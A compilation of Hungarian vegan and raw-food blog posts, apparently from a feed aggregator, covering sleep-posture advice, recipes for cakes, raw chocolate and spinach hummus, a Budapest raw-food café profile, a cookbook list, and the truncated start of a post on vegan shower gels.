eleget aludjunk és megfelelő minőségben. A porckorongok éjszaka regenerálódnak, ha megméred a testmagasságod este és utána reggel is ezt Te magad tapasztalhatod. A gerinc természetes helyzete elölről és hátulról nézve egyenes, de oldalnézetből egy dupla s alakot ölt. Az alvási pozíciók kialakításánál a cél, hogy az éjszaka folyamán a gerinced természetes görbületeit tudd megtartani és ne történjen semmilyen deformáció. Megfelelő alvási pozíció A megfelelő alvási pozíció tehermentesíti a gerinced és biztosítja a gerinc és a belső szervek éjszakai regenerálódását. Mindannyian más-más alvási pozíciót részesítünk előnyben, de fontos tudni, hogy mely pozíció, milyen formában biztosítja, hogy a gerinced tehermentesítve legyen az alvás során. Egy jól megválasztott alvási pozícióval és egy jó matraccal megelőzheted a gerincproblémák egy részét, illetve sokat tehetsz meglévő mozgásszervi problémáid gyógyításáért. Tapasztald ki számodra mely alvási pozíció kényelmes és biztosítja reggelre a regenerálódást. Mindenképpen mondj le a túl sok, túl puha és magas párna használatáról, mert nagyon kedvezőtlenül hat a gerinced állapotára. és most nézzük az alvási pozíciókat Háton A legjobb pozíció a hanyattfekvés - szimmetrikusan elhelyezkedve. A fejedet támaszd alá egy laposabb párnával, hogy a nyakizmokban se legyen túlfeszültség az éjszaka folyamán és meg tudd tartani a nyaki gerinced természetes görbületét. Így biztosítod az éjszakai alvás során, hogy a gerinced egyenes maradjon és az izmok szimmetrikusan mindkét oldalon tehermentesítve legyenek, el tudjanak lazulni. Bármilyen pozícióban is alszol, a legjobb ha átszoktatod magad a hanyattfekvő pozícióra. Ha úgy érzed, a derekadban feszültség van, helyezz párnát a térdeid alá, így csökkentheted a deréktáji szakasz terhelését. Kipróbálhatod, hogy egy összegöngyölt törölközőt teszel a derekad alá. Oldalt fekvés Ha oldalt fekszel, úgy válaszd meg a kispárnádat, hogy biztosítsa számodra a nyaki gerinced megfelelő helyzetét. Ha magad elé képzeled a gerinced, akkor az ágy fekvőfelületével legyen párhuzamos - nem jó ha a fejed lefelé lóg vagy éppen túl magasra teszed a párnát és ezáltal a fejed föntebb lesz mint a nyaki gerinced vonala. A cél, hogy a párna, a nyak vállöv területét ki tudja tölteni, ekkor fog megfelelő alátámasztást biztosítani a nyaki gerincednek. Ezzel biztosíthatod, hogy az éjszaka folyamán a nyakizmaid ellazuljanak. A derekad védelmének érdekében hajlítsd be kicsit a térdidet és helyezz egy párnát a két lábad közé, hogy csípőszélességben legyen a két térded - így nem csavarod el a medencédet és a térdedben sem keletkezik túlfeszültség. Még jobb, ha a párna a bokákat is tartja. Ha igazán szeretnél figyelni a testhelyzetedre, akkor a gerinced felsőbb szakaszában sem hozol létre elmozdulást és a vállövedet is alátámasztod, annyira, hogy a két vállad egymás fölé kerüljön. Amennyiben nagyon vékony a testalkatod, akkor egy törölközőt összetekerhetsz és beteheted a derekad alá, így megtámasztva a deréktáji szakaszodat. Hason A hason fekvés a legkevésbé jó pozíció, részben mert a belső szerveket összenyomod és nem tudnak megfelelően regenerálódni, és a legnagyobb kockázata a nyaki gerincszakasz nagymértékű rotációja. Éjszaka folyamán hosszú órákon át egyik oldalra elcsavarva tartod a fejed, amely részben sajnos a nyaki porckorongokat elkezdi az ellenkező oldalra tolni, másrészt pedig a nyakizmaidat is egy aszimmetrikus terhelésnek teszed ki - az egyik oldalon túlfeszülnek a nyakizmaid. Használj lapos párát a fejed alá, hogy kisebb fokú legyen a rotáció. Ne aludj teljesen hason fekve annak érdekében, hogy a nyaki gerincben ne hozz létre nagyfokú rotációt. Próbálj párnát használni vagy sokan takarót gyűrnek be maguk alá, hogy kompenzálják a nagyfokú csavaródást. A másik kockázata a hason fekvésnek, hogy nem csak a nyaki gerinc, de a deréktáji szakasz és a medence helyzete is általában aszimmetrikusan helyezkedik el. Ennek a következtében sajnos, ahogy a nyaknál itt is rögzülhet az izmokban egy helytelen tartás. Ami csípőproblémákhoz, deréktáji panaszokhoz vezethet. Ha teheted próbálj más alvási pozícióra átszokni a hason alvásról. Ébredésnél reggel, mindig szánj időt arra, hogy a tested is felébredjen, Nyújtózkodj nagyokat, mozgasd át kicsit magad mielőtt felkelnénk az ágyból, így felkészülhetnek az ízületek, izmok a terhelésre. Pihentető alvást kívánok:)
Nora Cochrane: Én, az Ébredés
Egy napon rájössz majd, mi is az az étel. Nem ugrándoz, nem néz rád mind a két szemével, Nem lesi szavaid simításra várva, Nem rezzen össze a mészárszékre állva… Mert számodra az étel mindaz, mi megterem, A földből bújik elő, a napfényben, nesztelen. Illata messziről magához csalogat, Ösztönöd megsúgja, kezed mit válogat. Rájössz, hogy valójában nem vonz a vér szaga, Taszít az öldöklés mardosó gondolata. Mire rávett egykoron a túlélési kényszer, Kegyetlen mivolta szívedhez nem ér fel. Békét akar lelked, erre vágyik végre, Nem mindegy ezentúl, mit eszel ebédre, Ami téged táplál, a föld magától adja, Az a Te ételed, minek nem volt anyja. The post Nora Cochrane: Én, az Ébredés appeared first on VegaNinja.
Narancstorta
Piskótát sütni mindenki tud. Összetevői a bűvös hármas: liszt, cukor, tojás... plusz egy nagy csipet só. Ha valaki gluténérzékeny sem kell lemondjon róla. Sütöttem már alternatív lisztekkel, jobbak lettek, mint az eredeti változat. Vannak favorit párosaim: a narancskrémhez máklisztes piskóta, a csokis-mogyorós tortához pedig gesztenyeliszt. A mandulaliszttel sóher vagyok, szoktam picit csalni, fele részben barna rizsliszttel keverem, ettől jobb az ár-érték arány, meg a hangulatom :-) Mint látjuk a lisztet variálni nem különösebb probléma a piskótánál. A cukor alternatíváinak tárgyalásába a karakter hiánya miatt nem mennék bele. Szerintem a cukorpótlásban van rossz, rosszabb és legrosszabb megoldás...nekem a természetesség és mértékletesség, ami bevált. A tojásmentes változata egy piskóta tésztának már keményebb dió. A tojás adja ugyanis a piskóta szivacsos állagát, ezt más úton elérni egyenlő a lehetetlennel. Ha mégis ilyen próbálkozásba kezdünk, akkor fel kell készülnünk rá hogy az így készült piskóta csak nevében lesz az. Nem szükséges rá negatív jelzőket aggatni, más lesz az állaga és ennyi. A sütés idejét belőni a legnehezebb, sajnos nem látunk bele a tésztába, a tűvel való szurkálás nekem nem szokott segíteni, inkább elbizonytalanít, meg a tészta felülete is csupa lyuk lesz. Ha kellően sok energiát teszünk a kísérletezésbe egyik másik receptúrával, érdemes feljegyzetelni a recept mellé a sütési hőmérsékletet és a kiizzadott optimális időt. Ez a recept már kiállta a sütés és az evés próbáját, többször is! A sütemény glutén-, tojás- és laktózmentes lesz, így az együtt egy asztalnál helyet foglalók közül már csak az nem tud belőle enni, aki dióra, mandulára, kesudióra, narancsra, nádcukorra és az összes többi hozzávaló valamelyikére allergiás. Narancsos piskóta tészta: - 1 csésze barna rizsliszt - 1/2 csésze mandulaliszt - 1 ek. kukoricakeményítő ( elhagyható) - 1/2 csésze barna nádcukor - 1/2 tk. szódabikarbóna - 1/4 tk. sütőpor - 1 tk. vanília por - nagy csipet só - 1 csésze frissen csavart narancslé ( rostjai is mehetnek bele ), ez kb. három narancsból nyerhető ki - 2 ek. kókuszolaj - 1 tk. almaecet ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Tegyük egy tálba a száraz összetevőket, egy kisebb másikba pedig a nedveseket. Külön-külön keverjük őket át alaposan, majd a folyékony részt több részletbe adagolva vegyítsük a szárazzal. Egy nokedli tésztánál kicsit folyósabb állagú masszát kell kapjunk, amit egy 18 cm átmérőjű kapcsos tortaformába simítunk. Amennyiben nagyobb tortát szeretnénk sütni, akkor az összetevők mennyiségét arányosan növeljük. Sütési idő 30-35 perc 175 fokon. Kesudió krém: - 1 csésze kesudió - 1/4 csésze kókuszolaj - 2-3 ek. folyékony édesítés ( méz vagy vegán alternatívái: rizsszirup, agavé, juharszirup ) - 1 tk. vanília por - 1/2 csésze narancslé ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- A hozzávalókat tegyük bele egy nagy teljesítményű tölcséres turmixba és addig járassuk, míg egy krémes állagú sima masszát nem kapunk. Ha folyadékra lenne még szükségünk, akkor adhatunk hozzá több narancslevet. Mielőtt a tortára kenjük, tegyük be a hűtőbe fél órára, hogy a kókuszolaj visszadermedjen. Narancslekvár: - 3-4 narancs filézve + a leve kifacsarva - ízlés szerint barna nádcukor - 1 citrom leve - 1 tk. pektin ( a cukorba keverve ) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Késsel hámozzuk körbe a narancsokat, hogy a héja alatt lévő fehér kesernyés rész ne kerüljön bele. majd filézzük ki. A maradékból a levet nyomkodjuk ki alaposan, egy csepp se menjen kárba! A cukorba keverjük el a pektint és adjuk hozzá a narancshoz, majd forraljuk fel a lekvárt. Maximum 10 percig főzzük alacsony lángon. Mikor teljesen kihűlt díszítsük vele a tortánk tetejét. Tálaláshoz durvára vágott pirított dió illik hozzá és szárított narancsvirág.
Egy nap mostanában
2016. március 19. Sose mondd, hogy soha
- 1 kg narancsból kb fél liter narancslé reggelire - 600 g szőlő ebédre (nagyon drága és nagyon import, de nem tudok lekattani róla, annyira imádom) - 5 kis banán, egy marék datolya és 10 dkg eper - turmix délután - 1 kicsi édesburgonya főzve, 3 paradicsom, zöld saláta vacsorára
Nyers sós goji bogyós csokoládé + Nyereményjáték egy nagyon csokis csomagért
2016. március 19. Zizi kalandjai
Régóta készültem már nyers csokoládét csinálni… el is terveztem, hogy lesz citromos, mogyorós, sós… aztán megszületett ez a sós-goji bogyós-kakaóbab töretes változat. Nagyon sokféle verzió lehetséges, tényleg az ízlésetekre bízom, hogy ti mit szórtok az elkészült csokoládé tetejére. Jelen esetben a goji bogyó adja a savasságot és gyümölcsösséget, a kakaóbab töret a ropogósságot, a só pedig – jelen esetben Maldon só, de bármilyen nagyobb szemcsés só megteszi – csak ellensúlyozza az édességet… amúgy is imádom a sós csokoládét. Datolyasziruppal édesítettem, ami kicsit karakteres ízű, szóval, ha valaki nem szereti a datolyát, vagy kevésbé “intenzív” édesítést szeretne, az használjon inkább juharszirupot. A feltéteken és a datolyaszirupon kívül a csokoládé alapját a kakaóvaj és a nyers kakaópor adja (természetesen elkészíthető nem nyers kakaóporból is).
A kakaóvaj a kakaófa terméséből,vagyis a kakaóbabból kinyert nyers és tiszta növényi zsír. Igen gazdag E-vitamin forrás, ami hozzájárul a sejtek megvédéséhez az oxidatív stressz ellen. A kakaóvaj a kakaóporral ellentétben minimális mennyiségű teobromint és koffeint tartalmaz.
A kakaóporban lévő magnézium és vas csökkenti a fáradtságérzetet, míg a cink, egy antioxidáns, megvédi a sejteket az oxidatív stressz ellen és hozzájárul az egészséges bőr-, haj- és köröm növekedéshez.
A nagy csokoládé táblából lehet kisebb darabokat törni, becsomagolni és húsvétra ajándékba adni csokinyúl vagy csokitojás helyett.
Nyers sós-goji bogyós csokoládé
Hozzávalók:
– 175 g kakaóvaj
– 100 g nyers kakaópor
– 150-160 ml datolyaszirup vagy juharszirup
– goji bogyó
– kakaóbab töret
– néhány csipet nagyobb szemű só (Maldon sót használtam)
Tegyük a kakaóvajat egy hőálló tálba, a tálat pedig egy lábassal teli víz fölé (úgy, hogy a tál alja ne érjen bele a vízbe). Közepes láng felett melegítsük a vizet és felette a kakaóvajat, lassan kevergetve, amíg a vaj teljesen felolvad.
A felolvadt vajat vegyük le a lábas tetejéről és tegyük bele a kakaóport (szitálva) és a datolyaszirupot. Lassan kevergetve várjuk meg, amíg minden összeolvad gyönyörű, fényes csokoládévá.
Béleljünk ki egy kb. 20*30 cm-es tepsit vagy dobozt sütőpapírral és öntsük bele a csokoládét. Szórjunk a tetejére goji bogyót, kakaóbab töretet és sót. Tegyük hűtőbe legalább két órára, várjunk, amíg megkeményedik és törhető lesz kisebb falatokra.
*****
A kakaóvajat, kakaóport, kakaóbab töretet és goji bogyót a {Planetbio} biztosította a recepthez. A véleményem csakis a sajátom.
Jó hír, hogy a Planetbio felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Minden online vásárlás végösszegéből 10% kedvezményt nyújt a cég. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI. Ráadásul, aki a 300 grammos kakaóport és a 300 grammos kakaóvajat is megrendeli, az egy szilikon bonbon formát kap ajándékba.
*****
NYEREMÉNYJÁTÉK!
Nyeremény : egy 10 ezer Ft értékű ajándékcsomag a Planetbio Magyarországtól, amelyben van 1 db nyers kakaópor (150 g), 1 db kakaóvaj (150 g), 1 db kakaóbab töret (150 g), 1 db goji bogyó (150 g) és 1 db szilikon bonbon forma.
Írjátok meg ide a bejegyzés alá kommentben, hogy ti mivel ízesítenétek a csokoládét. Extra pontért (hogy a kalapba kétszer kerüljön bele a nevetek) lehet lájkolni a Planetbio Magyarország Facebook oldalát.
Szabályok : Kérem, hogy az alábbi formula/”táblázat” minden pontját értelemszerűen töltsétek ki! A játék 2016. március 19-től 2016. március 22-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2016. március 23-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Planetbio Magyaroszág postázza magyarországi címre.
a Rafflecopter giveaway
Naspolya Nassolda, a budapesti nyers nassolda
2016. március 17. Vegán lettem
Édességre vágytam így meglátogattam a Naspolya Nassolda nasizót, mely Budapest egyik közkedvelt nyers csemegézője.
Szokásomhoz híven, ha már arra jártam nem csak kóstoltam, hanem kérdeztem is. Ha a belvárosban laksz akkor számodra a Naspolya Nassolda könnyedén megközelíthető, mivel a Deák Ferenc tértől mindössze 3-4 perc sétára található a Káldy Gyula utcában. De ha nem akarsz útra kelni, akkor sem kell elkeseredni, mivel webshopjukban házhoz szállítással is rendelhetőek az aktuális finomságok. Na de ennyire ne szaladjunk előre!
A Naspolya Nassolda története
A Naspolya Nassolda alapító-tulajdonosai Bárányos Réka és Novák Ádám, akik az életben is egy párt alkotnak. Réka és Ádám körülbelül egy éven át követték a nyers-vegán vonalat, pontosabban az azon belül is szigorúnak számító 80/10/10 étrendet, amely az egyik legegészségesebb táplálkozási irányzatnak számít manapság. A tisztán nyers étkezés pozitív élettani hatásait gyakorlatilag azonnal megtapasztalták magukon, Réka nagy kedvvel kezdett kísérletezni ezekkel a formabontó receptekkel és hamarosan megszületett egy nyers-vegán cukrászda létrehozásának a gondolata. A Naspolya Nassoldát 2014 decemberében nyitották.
Az étkezéshez való viszonyukról így nyilatkozott Réka: “Már csak részben követjük a nyers-vegán táplálkozást, de nem is akartuk soha beskatulyázni magunkat. Ha télen egy meleg leves esik jól, akkor azt eszem mindenféle rossz érzés nélkül. Abban hiszek, hogy az ember úgy táplálkozzon, ahogy jól érzi magát!”
Az alkalmazottak kiválasztásánál nem kikötés a vegánság, mivel maga a Naspolya Nassolda megnyitásával sem a nyers-vegán étrend melletti kizárólagos elkötelezettséget akarták képviselni. Sokkal sokkal inkább egy alternatívát mutatnak azok számára, akik szeretnék megtapasztalni, hogy cukor hozzáadása nélkül, nyersen, elsősorban gyümölcsökből és magvakból készült édesség is lehet olyan finom, vagy akár még finomabb, mint egy cukros, habos, tojásos sütemény.
A hely kínálata egyébként nem 100%-osan vegán. Az aktuálisan kapható kb. 25 termékből mindössze négy édességükhöz használnak mézet, de külön kérésre ezeket is el tudják készíteni vegán módra. A termékek összetevői között külön jelölik a mézet, és szóban is készséges tájékoztatást adnak, így a vegánok is teljes biztonsággal válogathatnak a Naspolya finomságai között. A vegán vendégkörre való tekintettel az új receptek kidolgozásánál már hangsúlyt kap a méz teljes mellőzése. (Amennyiben a Naspolya veganizálódik, frissítem a cikket.)
A Naspolya Nassolda kínálata
Az alapanyagok felhajtására komoly energiát fordítanak Rékáék és nagyon megválogatják a forrásokat az alapanyagok minősége miatt. Legfőképpen biopiacról és őstermelőktől vásárolnak, így kerülvén el a nagyipari termelésből érkező növényeket, melyek vitamin tartalma messze alul maradnak a bio termelésből származó növényekétől. Kerülik az olyan népszerű növényi zsírok, mint például a kókuszzsír használatát is, amely egyébként igen elterjedt hozzávaló a nyers étkezésben. Réka szerint a nyers édességek remekül elkészíthetők enélkül a teljesen felesleges zsírbevitel nélkül is.
A Naspolya Nassoldában minden helyben készül, még a mandulatej is, így biztosítva a frissességet és a kiváló minőséget. A kínálatot az adott évszakra jellemző zöldségek és gyümölcsök alakítják, hiszen a termékpaletta elsősorban a hazai idénygyümölcsökre épül. A cikk elkészülte közben például számos nehezebb téli nyers finomságokat kínál a webshop. A Naspolya Nassoldában a számos aszalványon (trüffelek, granolák, datolyagolyók) kívül ínyenc nyers torták és piték, karobos chia puding, zöldségcsipszek, illetve frissen facsart gyümölcslevek, mandulatejes italok és kávékülönlegességek is kaphatóak. Tavasztól gyümölcsös müzli-szerű reggelit vezetnek be többféle ízben, természetesen tojás-, tej-, tejtermék-, glutén- és hozzáadott cukor-mentesen (az összes kitétel egyébként minden termékükre elmondható).
Feltettem a szokásos kérdésemet Rékának, miszerint melyik az az édesség szerinte, mely a leginkább mutatja be a Naspolya Nassoldát. “Legyen mondjuk a sós-karamellás cupcake, ez a vendégeink egyik nagy kedvence. Aszalt datolyával édesítjük, Himalája-sóval sózzuk belül, Maldon-sópelyhekkel kívül, az ízvilága így válik a sós-karamellához hasonlóvá. A receptek kidolgozásánál egyébként arra törekszem, hogy ezek az édességek valódi kulináris élményt nyújtsanak, tehát ne “csak” egészségesek legyenek.”
Réka a nyers étkezésről
A hőkezelés nélkül készült nyers ételek egyik legfontosabb tulajdonsága, hogy a készítés során nem károsodnak az enzimek a táplálékban, amelyek mind az emésztéshez, mind a vitaminok hatékony felszívódásához szükségesek. A nyersétkezők nem főznek, nem sütnek, nem párolnak, de még az aszalás során sem teszik ki az alapanyagokat 42°C feletti hőmérsékletnek. Réka vallja, hogy az előítéletekkel ellentétben nyersen táplálkozni nem nehezebb, mint bármely más étkezési formát követni. Sőt!
“Az emberek mára elfelejtették, hogy mennyire egyszerűen és gyorsan tudunk finom ételeket készíteni gyümölcsök és zöldségek felhasználásával. Pedig a növények éltetik az emberi szervezetet!” - mondta Réka.
A beszélgetés végére azt a konklúziót vontam le, hogy a nyers étkezés nem egy bonyolult dolog. Ahogy a húst, a tojást és a tejtermékeket is főleg megszokásból fogyasztják az emberek, úgy ha a nyers ételekhez szoknánk hozzá, akkor az lenne a mindennapos. Utánajárással jár az elején, mint minden új dolog, de egy idő után természetessé válik. Alátámasztva Réka a nyers étkezés egyszerűségét megosztotta velünk egyik kedvenc nyers vegán receptjét a Naspolya Nassolda ajánlásával:
Nyers-vegán datolyagolyók
Hozzávalók:
1,5 csésze datolya
1 csésze mandula
mandulaőrlemény
Elkészítés:
A datolyát vágd egészen apró darabokra, a mandulát őröld meg. Kézzel gyúrd össze először csak a feldarabolt datolyát, egy ragacsos masszát fogsz kapni. Ezt dolgozd egynemű állagúvá az őrölt mandulával, fűszerezd kedved és ízlésed szerint, majd gyúrj belőle neked tetsző méretű golyócskákat. A golyókat forgasd meg végül mandulaőrleményben.
A nyers étkezés iránt érdeklődőknek Réka a következőket tanácsolja: “A nyersétkezésre való áttérés fokozatosan vagy egy határozott döntés nyomán, azonnal is megtörténhet. Nagyon fontos, hogy kellő mennyiségű információ, utánaolvasás előzze meg ezt, hogy nyersétkezőként valóban mindent megadjunk a szervezetünknek, amire szükségünk van. A gyümölcsturmixok vagy zöldségekből (aszalással) készített chipsek nagyon ínycsiklandó belépők ebbe a világba.”
Zárásként a Naspolya Nassolda hitvallása és küldetése:
Megmutatni az embereknek, hogy a nassolás igenis lehet egyszerre nagyon finom és tökéletesen egészséges! Szerettünk volna leszámolni a nassolás fogálmához tapadt lelkiismeret-furdalással. Egy egészséges desszert elfogyasztása után energikusabbak leszünk, hiszen tiszta energiát adó táplálékhoz jutunk. A testünk-lelkünk hálás lesz az élményért.
Az az apróság pedig csak hab a tortán – természetesen nyers vegán tortán -, hogy a Naspolya Nassolda 100%-osan kutyabarát hely. 2015-ben az év kutyabarát helyek díjának különdíját nyerte el. Gratulálok és köszönöm minden kutyus nevében!
Nyitvatartás:
Minden nap: 10:00 és 20:00 óra között.
Kiszállítást az egész ország területére vállalnak.
Cím: 1061 Budapest, Káldy Gyula utca 7.
A Naspolya Nassolda honlapja és a Naspolya Nassolda facebook oldala.
Spenótos humusz (gluténmentes, laktózmentes, tojásmentes, vegán), és a zöld melegszendvics (gluténmentes, tojásmentes)
2016. március 16. Zöld Avocado
Holnap megint Szent Patrik nap. Ez azt jelenti, hogy a Világ minden táján az írek zöldbe öltöznek, és ünnepelnek. Tavaly már készítettem zöld menüsort erre az alkalomra, és az idén is megemlékezem egy zöld színű, de arab étellel az ír zöld napról. Szeretem ezt a színt! ;-) spenótos humusz és a zöld melegszendvics (gluténmentes, tojásmentes) A csicseriborsóból készült arab ételek közül az egyik legnépszerűbb étel, a humusz. Nemcsak mert egyszerű, és nagyszerű, tápláló és egészséges, de felhasználhatósága is szerteágazó. Fogyaszthatjuk önmagában friss, ropogós saláta kíséretében, vagy kenyérre kenve szendvicsként, de megtölthetjük vele a házi wrapunkat, a húsmentes hamburgerünket, kísérheti a zöldséges fasírtjainkat, falafelünket, vagy csak egyszerűen kifőtt tésztával összekeverve, mint, egy "szósz" gazdagíthatja a vacsoránkat. Köszönhetően a vegetáriánus konyha napjainkban is zajló térhódításának, egyre több asztalra jut el a humusz, ami nem mellesleg tökéletes fehérjeforrás a húsmentes étrenden élőknek is. spenótos humusz (laktóz-, glutén-, tojásmentes, vegán) Engem személy szerint sokáig elkerült a humusz. Nem azért mert nem találkoztam vele, hanem azért mert az avokádóhoz, és a brokkolihoz hasonlóan nem volt szerencsés az első találkozás. Nyersen beleharapni az avokádóba, szétfőtt brokkolit piszkálni, és natúr, ízetlen és színtelen humuszt kóstolni, nem éppen pozitív élmény. Jó pár évig hanyagoltam is ezeket az alapanyagokat, mígnem újabb esélyt kaptak tőlem, és más megvilágításban, igazi finom ételekben megtaláltuk a közös hangot. A mostohagyerek avokádóhoz és brokkolihoz is, számos ínycsiklandó recepttel szolgálok nektek a Zöld Avocado vegetáriánus gasztroblogon. És akkor nézzük most a humuszt! Szeretem a szép színes ételeket, így a humuszba is csempésztem egy kis életet, egy kis színt. A következő receptben egy nagyon szép zöld színű, és egyszerűen elkészíthető, spenótos humuszt mutatok meg nektek. Miért fogyasszunk rendszeresen csicseriborsót? csicseriborsó - kitűnű fehérjeforrás - magas magnézium, cink és vastartalom - tartalmaz még: karotint, E-vitamint, B1- és B6-vitamint - pektintartalma és lassú felszívódása miatt csökkenti a vércukorszint ingadozást, ezért a cukorbetegek előszeretettel fogyasztják - alacsony zsír- és magas rosttartalma miatt a fogyókúrázók és diétázók előszeretettel alkalmazzák - "élelmi rostokban gazdag: támogatja emésztésünk munkáját, és segít megszabadulni a bélfalakon lerakódott salakanyagoktól - a rostban gazdag alapanyagok rendszeres fogyasztásával normalizálhatjuk vérnyomásunkat, segíti a koleszterin kiürülését szervezetünkből, ezáltal csökkentve a szív- és érrendszeri betegségek kialakulásának kockázatát - az emésztés serkentésével megszünteti a székrekedés okozta nehézségeket - magas folsavtartalma miatt a kismamáknak, míg magas triptofántartalma miatt a szülés utáni depresszióban szenvedőknek vagy éppen a fáradt, kimerült felnőtteknek és gyerekeknek nyújthat segítséget - csicseriborsóból lisztet is szoktak készíteni, mely a gluténérzékenyek diétájának fon tos alapanyaga lehet" Forrás: Házipatika spenótos humusz (laktóz-, glutén-, tojásmentes, vegán) HOZZÁVALÓK (egy müzlistálnyi adaghoz) - 1 bögre száraz csicseriborsó vagy 1 db konzerv bio csicseriborsó - Himalája só, őrölt fehér bors - 3 gerezd fokhagyma - 4 ek tahini szósz - 1 ek extra szűz olívaolaj - 1 citrom frissen facsart leve - 5 ek tiszta víz (főző víz) - 2 marék friss spenótlevél - (elhagyható - 1/2 db érett avokádó) ELKÉSZÍTÉS Ha száraz csicseriborsót használunk, áztassuk be min. 12 órára, majd kb. 80 perc alatt főzzük puhára sós vízben, közepes lángon (pótold a vizet, mert folyamatosan elfő). Ha konzerves borsót használunk, nem kell megfőzni. A megfőtt csicseriborsót és a többi hozzávalót beletesszük a nagy teljesítményű aprítógépünkbe, és krémesre kevertetjük vele. (Kézi botmixert is használhatunk, de nem lesz olyan krémes.) Kész is a spenótos humusz. És, hogy mit is kezdhetünk a zöld humusszal? Például ezt! ;-) Zöld melegszendvics, spenótos humusszal A tetszés szerinti (GM) kenyérszeleteket kenjük meg spenótos humusszal, szeljünk rá kemény sajtot, helyezzünk rá pár szem friss spenót levelet, majd az egészet szórjuk meg görög feta sajttal, amit előtte kézzel vagy villával morzsára törtünk. Helyezzünk a tetejére egy újabb spenótos humusszal megkent kenyérszeletet, hogy a szendvicsnek legyen teteje is. Helyezzük őket az összecsukható szendvicssütőnkbe, és sajtolvadásig süssük a zöld melegszendvicseinket. spenótos humusz és a zöld melegszendvics (gluténmentes, tojásmentes) Táplálkozz ne csak étkezz a Zöld Avocado-val! :-) Megjegyzés1: Most kezdődik a medvehagyma tavaszi szezonja. Próbáljuk ki a humuszt spenót helyett medvehagymával is! ;-) Megjegyzés2: "A tahini finomra őrölt szezámmagból készült sűrű állagú massza, melyet elsősorban keleti ételek alapanyagaként használnak. Több változata ismeretes. Készülhet hántolt vagy hántolatlan szezámmagból - előbbit a Közel-Keleti (arab és zsidó) konyha használja, utóbbi inkább a kínai, koreai és japán ételekhez kedvelt. A hántolatlan változatnak magasabb a tápértéke, ugyanakkor keserűbb az íze. Felhasználhatnak hozzá nyers vagy enyhén pörkölt magokat egyaránt. A hőkezelés hatására a kész tahiniben csökken bizonyos vitaminok, tápanyagok mennyisége. Mivel a tahini egyetlen alkotóeleme a szezámmag, ezért tápanyag és vitamintartalma is hasonló, annyi különbséggel, hogy azok felszívódása sokkal hatékonyabb a magok megőrlése miatt. A tahini kitűnő forrása a réznek, magnéziumnak, kalciumnak és cinknek, ugyanakkor gazdag rostokban és B1 vitaminban. A gazdag tápanyagtartalom ellenére néhány embernél a szezámmag (és így a tahini) fogyasztása allergiás reakciókat eredményezhet. A világszerte növekvő szezámfogyasztás sajnos ezen egészségügyi problémák számát is folyamatosan gyarapítja. Az Európai Unióban forgalmazott előre csomagolt ételeken ezért kötelező feltüntetni, ha szezámot vagy szezámszármazékot tartalmaznak." Forrás: Wikipédia spenótos humusz és a zöld melegszendvics (gluténmentes, tojásmentes)
Bounty torta/ Raw bounty cake
2016. március 15. Nyers konyha
Nagy volt a nyüzsgés nálunk a napokban. Barátok jöttek- mentek. Persze vártam őket mindenféle finomsággal. Bounty tortát még nem készítettem, de mivel nálunk mindenki szereti a kókuszt, gondoltam megpróbálkozom ezzel is. Ahogy általában nem szeretek recepteket követni, így most is mentem a saját fejem után, tettem bele amit gondoltam. Az eredmény szerintem eléggé rendben lett, fogyott is rendesen!:) Bounty torta: alap: 100 gramm kókuszdara 5 evőkanál kakaópor 1 evőkanál kókuszzsír 50 gramm mazsola előtte vízben megpuhítva Krém: 100 gramm kesudió 200 gramm kókuszdara 200 ml kókuszkrém 4 evőkanál kókuszzsír 10 kanál agavé szirup Nem vagyok oda az édes édességekért, így közben érdemes kóstolgatni a krémet és ha nem elég édes még adni hozzá édesítőt. Alaphoz S késes robotgéppel pépesítjük a mazsolát. Hozzáöntjük a többi hozzávalót és eldolgozzuk. A masszát kicsi csatos formába nyomkodjuk. A krémhez a kókuszdarát lisztté őröltem a turmixgépemmel, ez elhagyható folyamat. Üres turmixgépbe öntjük az összes hozzávalót kivétel a kókuszdarát. Krémesre turmixoljuk, ha szükséges kicsi vizet teszünk hozzá. Ha kész hozzákeverjük a kókuszdarát, és a krémet a formánkba öntjük. Hűtőben hagyjuk megdermedni.
Könyveim
2016. március 14. Gitta nyersétel blogja
7 nyersételes könyvem jelent meg eddig, ezeket a nagyobb könyvesboltokban, vagy a Bioenergetic kiadótól meg lehet vásárolni. Ha dedikált példányra vágysz, akkor tőlem is megrendelheted. Eljöhetsz érte, és akkor személyesen adom át, egy pár kedves szó kíséretében. Ha a Nyersétel Akadémiára jössz be érte, akkor még egy kis kóstoló is akad :) Ha messze laksz, feladom neked postán, ebben az esetben a postaköltséget is ki kell fizetni. Élő ételek könyve 3200 forint helyett 3000 forint Élő ételek könyve Élő édességek könyve 2440 forint helyett 2200 forint Élő édességek könyve Élő italok könyve 2600 forint helyett 2450 forint Élő italok könyve Lúgosítás élő ételekkel - átállás 4 lépésben 3200 forint helyett 3000 forint Lúgosítás élő ételekkel Élő aszalványok könyve 2940 forint helyett 2750 forint Élő aszalványok könyve Szivárvány szakácskönyv 2490 forint helyett 2200 forint Szivárvány szakácskönyv Élő ételek ünnepnapokra 3690 forint helyett 3400 forint Élő ételek ünnepnapokra
Vegán tusfürdők a magyar üzletekben és boltokban
2016. március 13. Vegán lettem
Vegán tusfürdők egyre nagyobb választékával találkozhatsz már nagyobb hipermarketekben és drogériákban is! Körbejártam ezeket a boltokat és összeszedtem nektek őket. Nem sokan tudják, hogy a háztartási termékek zömének gyártása bizony felesleges szenvedéssel jár. A tusfürdők, dezodorok, takarítószerek összetevőit és a kész termékeket is ártatlan állatokon tesztelik. Majmok, nyulak, macskák, kutyák, egerek ezrei halnak meg kínok között minden évben az ilyen értelmetlen évekig tartó tesztelések miatt. 2015-ben számos állatjogi siker között üdvözölhettük az ilyen jellegű tesztek tiltását számos országban. Nem szükséges ezen állatok szenvedése! Válassz cruelty free vagy vegán tusfürdőket! Amikor vegán tusfürdőt keresel érdemes odafigyelni a jelzésekre, ugyanis több logóval találkozhatsz a piacon. Alapvetően vannak a “cruelty free” vagy “non tested on animals” – erőszakmentes – tusfürdők, melyeket nem teszteltek állatokon, valamint vannak a kifejezetten vegán tusfürdők, melyeket nem teszteltek állatokon és állati eredetű összetevőket sem tartalmaznak. Ezeknek pontos 